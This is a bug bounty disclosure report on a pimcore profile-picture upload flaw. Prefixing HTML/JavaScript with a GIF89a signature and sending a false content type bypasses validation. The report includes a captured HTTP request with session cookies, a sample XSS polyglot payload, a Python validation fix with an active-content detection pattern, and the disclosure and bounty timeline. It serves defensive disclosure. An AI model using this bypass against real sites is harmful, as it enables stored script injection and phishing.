File Upload Type Validation Error in pimcore/pimcore


Reported on

Jan 17th 2023


The upload functionality for updating a user's profile picture does not properly validate the file content type: any authenticated user can bypass the check by prefixing the file with a valid image signature (e.g. GIF89) and sending an arbitrary, invalid content type. This could allow an authenticated attacker to upload HTML files containing JavaScript that will be executed in the context of the domain.

Proof of Concept

The following request was modified to upload an HTML file carrying a valid GIF signature, but it can be modified to upload any kind of content type:


Captured request for updating the profile picture:

POST /admin/user/upload-current-user-image?id=2 HTTP/1.1
Cookie: pimcore_admin_sid=1; PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzMzQzLCJwdGciOnsiX20iOjEsIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTc0NCwidmk6c3J1IjpbN119LCJleHAiOjE2NzM5MzM1NDR9._aLiOrKEnfyCJ7sjp21XNezGvj93gf9OSpkS82KaSnI; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzNDYyLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTU2MX0sImV4cCI6MTcwNTQ2Nzc0NH0.I1O7KjEqpnL2j7xv8NUruiX3EA50KMiVFShELH1WPsE
Content-Length: 366
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0BPEuMmR4S3FotDc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Content-Disposition: form-data; name="csrfToken"

Content-Disposition: form-data; name="Filedata"; filename="111.txt"
Content-Type: text/plain



HTTP/1.1 200 OK
Date: Tue, 17 Jan 2023 05:04:54 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=63072000; preload
X-Powered-By: PHP/8.0.10
Cache-Control: max-age=-1358399094, must-revalidate, private
X-Powered-By: pimcore
Content-Language: en
Pragma: no-cache
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; path=/; secure; HttpOnly; SameSite=strict
Strict-Transport-Security: max-age=63072000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: origin-when-cross-origin
X-Robots-Tag: noindex, noarchive, nosnippet
Connection: close
Content-Length: 16




This could allow an attacker to write custom pages. Those pages can contain phishing HTML or even JS code that will be executed in the context of the active user's browser.
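The defensive shape of a fix, as an added example that is not Pimcore's own code or the actual commit: decide the type from the file bytes, require the client's claimed Content-Type and extension to agree with it, refuse active-content markers hidden behind an image signature, and let the server choose the stored name and serve it with the detected type plus nosniff. Function names, the allowlist and the constructed sample inputs are assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Allowlist of profile-picture types, keyed by the magic bytes that must start the file.
# Values: (canonical MIME type, accepted client extensions, extension used on disk).
MAGIC = {
    b"GIF87a": ("image/gif", ("gif",), "gif"),
    b"GIF89a": ("image/gif", ("gif",), "gif"),
    b"\x89PNG\r\n\x1a\n": ("image/png", ("png",), "png"),
    b"\xff\xd8\xff": ("image/jpeg", ("jpg", "jpeg"), "jpg"),
}

# Heuristic polyglot check: markers that a raster image has no reason to contain
# but an HTML/JS or PHP payload smuggled behind a valid signature does. The robust
# complement is re-encoding the image through an image library, which drops trailing data.
ACTIVE_CONTENT = re.compile(rb"<(script|html|body|iframe|svg|img|\?php)\b", re.IGNORECASE)

@dataclass
class Verdict:
    accepted: bool
    reason: str
    content_type: str = ""
    stored_name: str = ""

def validate_upload(data: bytes, claimed_type: str, filename: str, user_id: int) -> Verdict:
    """Type is decided from bytes; the client-supplied header and name only have to agree."""
    detected = next((v for sig, v in MAGIC.items() if data.startswith(sig)), None)
    if detected is None:
        return Verdict(False, "unknown or disallowed signature")
    mime, exts, store_ext = detected
    claimed = claimed_type.split(";")[0].strip().lower()
    if claimed != mime:  # the reported bypass: text/plain upload whose bytes "are" a GIF
        return Verdict(False, f"claimed {claimed!r} does not match detected {mime}")
    if filename.rsplit(".", 1)[-1].lower() not in exts:
        return Verdict(False, "extension does not match detected type")
    if ACTIVE_CONTENT.search(data):
        return Verdict(False, "active content found behind image signature")
    # Stored name is derived from the user id and the detected type, never from the client.
    return Verdict(True, "ok", mime, f"user-{user_id}.{store_ext}")

def serve_headers(verdict: Verdict) -> dict:
    """Headers for serving an accepted upload so the browser cannot reinterpret it as HTML."""
    return {
        "Content-Type": verdict.content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'inline; filename="{verdict.stored_name}"',
    }

# Constructed samples: a 1x1 transparent GIF, and the shape of the PoC payload.
GIF_1X1 = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
           b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POC_LIKE = b"GIF89a<html><script>alert(document.domain)</script></html>"
```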


We are processing your report and will contact the pimcore team within 24 hours. 2 months ago
We have contacted a member of the pimcore team and are waiting to hear back 2 months ago
pimcore/pimcore maintainer has acknowledged this report 2 months ago
2 months ago


@pimcore any update?

Divesh Pahuja validated this vulnerability 2 months ago
ctflearner has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
JiaJia Ji marked this as fixed in 10.5.16 with commit 75a448 2 months ago
JiaJia Ji has been awarded the fix bounty
This vulnerability will not receive a CVE
JiaJia Ji published this vulnerability 2 months ago
2 months ago


@JiaJia Ji can you assign CVE for this

2 months ago


@Divesh Pahuja can you assign CVE for this

JiaJia Ji
2 months ago


@ctflearner CVE is under

Thank you again

2 months ago


Thanks for your response. @JiaJia Ji is it possible that this CVE-2023-23937 reflects into my huntr-dev account by talking to admin?
